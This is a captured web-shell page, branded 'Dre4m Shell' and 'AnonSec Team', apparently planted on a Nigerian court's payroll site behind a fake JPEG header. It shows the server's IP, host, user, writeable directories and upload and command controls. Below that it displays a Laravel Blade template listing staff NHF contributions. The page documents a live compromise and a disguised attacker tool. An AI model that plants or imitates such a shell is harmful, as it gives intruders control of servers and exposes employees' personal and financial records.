ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.145.93.221
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/nhfAccount/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/nhfAccount/displayall.blade.php
@extends('layouts.layout')
@section('pageTitle')
@endsection

@section('content')
<div class="box box-default" style="border-top: none;">
  <div style="margin: 10px 20px;"> @if(session('err'))
    <div class="alert alert-warning alert-dismissible hidden-print" role="alert">
      <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span> </button>
      <strong>Error!</strong> {{ session('err') }} </div>
    @endif </div>
  <div class="box-body">
    <div class="row" >
      <div class="col-xs-2"><img src="{{asset('Images/logo.jpg')}}" class="responsive"></div>
      <div class="col-xs-8">
        <div>
          <h3 class="text-success text-center"><strong>NATIONAL INDUSTRIAL COURT OF NIGERIA</strong></h3>
          <h4 class="text-center text-success"><strong>10, PORTHARCOURT CRESCENT, AREA 11, GARKI, ABUJA</strong></h4>
          <h5 class=" text-center text-success"><strong>STATEMENT OF ACCOUNT NHF AS AT {{date('Y-m-d')}}</strong></h5>
        </div>
      </div>
      <div class="col-xs-2"><img src="{{asset('Images/coat.jpg')}}" class="responsive"></div>
    </div>
    <div class="row" style="padding-left: 30px; padding-right: 30px;">
      <div class="col-md-6">
        
        <h5 class="text-success"><b style="color: #222;">YEAR: </b><strong >{{$year}} </strong></h5>
        @if($month != '')
        <h5 class="text-success"><b style="color: #222;">MONTH: </b><strong >{{$month}} </strong></h5>
        @endif </div>
    </div>
   
    <div class="row" style="margin-top:5px; padding-top: 15px; padding-left: 30px; padding-right: 30px;">
      <div class="col-md-12" style="padding-top: 0px; margin-top: 5px; ">
        <table class="table table-striped table-condensed table-bordered">
          <thead>
            <tr>
          <th>S/N</th>
          <th>NHF Number</th>
          <th>File Number</th>
          <th>Full Name</th>
          <th>Staff Mobile<br/> Number</th>
          <th>Email</th>
          <th>Basic Salary</th>
          <th>Total Amount</th>
          <th>Purpose</th>
        </tr>
              </thead>
          <tbody>
          
          @php $serial = 1; @endphp
         @if(is_null($search ))
           <tr>
            <td></td>
            
            <td></td>
            <td></td>
            <td> </td>
            <td>  </td>

            <td></td>
            <td></td>
            <td> </td>
            <td></td>
          </tr>

         @else
          @foreach ($search as $key=>$list )
          @php

          $basic = DB::table('basicsalary')
          ->where('grade','=',$list->grade)
          ->where('step','=',$list->step)
          ->where('employee_type','=',$list->employee_type)
          ->first();

          @endphp
          <tr>
            <td>{{$serial++}}</td>
            
            <td>{{$list->nhfno}}</td>
            <td>{{$list->fileNo}}</td>
            <td> {{$list->name}} </td>
            <td> {{$list->phone}} </td>

            <td> {{$list->email}} </td>
            <td> @if($basic !='') {{$basic->amount}} @endif</td>
            <td> {{$list->sum}} </td>
            <td>1 Month nhf contribution for the month of {{$month}} {{$year}}</td>
          </tr>
          @endforeach
          @endif
          <tr style="border-top: 2px solid #000;">
           
            <td style="text-align: right; color:#000; text-transform: uppercase;" colspan="7"><b>Total :</b></td>
            <td><b>{{number_format($totalnhf, 2, '.', ',')}}</b></td>
          </tr>
            </tbody>
          
        </table>
        <div class="hidden-print"></div>
      </div>
    </div>
    <!-- /.col --> 
  </div>
  <!-- /.row --> 
  
</div>
@endsection
@section('scripts') 
<script src="{{asset('assets/js/jquery-ui.min.js')}}"></script> 
<!-- autocomplete js--> 
<script src="{{ asset('assets/js/jquery.autocomplete.min.js') }}" ></script> 
<script src="{{ asset('assets/js/my-hr.js') }}" type="text/javascript"></script> 
<script type="text/javascript">
  $(function() {
      $('#searchName').attr("disabled", true);
      $("#autocomplete").autocomplete({
        serviceUrl: murl + '/data/searchUser',
        minLength: 2,
        onSelect: function (suggestion) {
            $('#fileNo').val(suggestion.data);
            $('#searchName').attr("disabled", false);
            //showAll();
        }
      });
  });
</script> 
@endsection

@section('stypes')
<style type="text/css">
    @import url(https://fonts.googleapis.com/css?family=Open+Sans);

body{
  background: #f2f2f2;
  font-family: 'Open Sans', sans-serif;
}

.search {
  width: 100%;
  position: relative; 
}

.searchTerm {
  float: left;
  width: 100%;
  border: 3px solid #00B4CC;
  padding: 5px;
  height: 20px;
  border-radius: 5px;
  outline: none;
  color: #9DBFAF; 
}

.searchTerm:focus{
  color: #00B4CC;
}

.searchButton {
  position: absolute;  
  right: -50px;
  width: 40px;

  height: 36px;
  border: 1px solid #00B4CC;
  background: #00B4CC;
  text-align: center;
  color: #fff;
  border-radius: 5px;
  cursor: pointer;
  font-size: 20px;
}

/*Resize the wrap to see the search bar change!*/
.wrap{
  width: 30%; 
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
}
</style>
@stop
@section('styles')
<link rel="stylesheet" type="text/css" href="{{asset('assets/css/custom-style.css')}}">
@endsection
@section('styles')
<style> 
  .textbox { 
    border: 1px;
    background-color: #33AD0A; 
    outline:0; 
    height:25px; 
    width: 275px; 
  } 
  $('.autocomplete-suggestions').css({
    color: '#0f3'
  });

  .autocomplete-suggestions{
    color:#fff;
    font-size: 13px;
  }
</style>
@endsection

Anon7 - 2022
AnonSec Team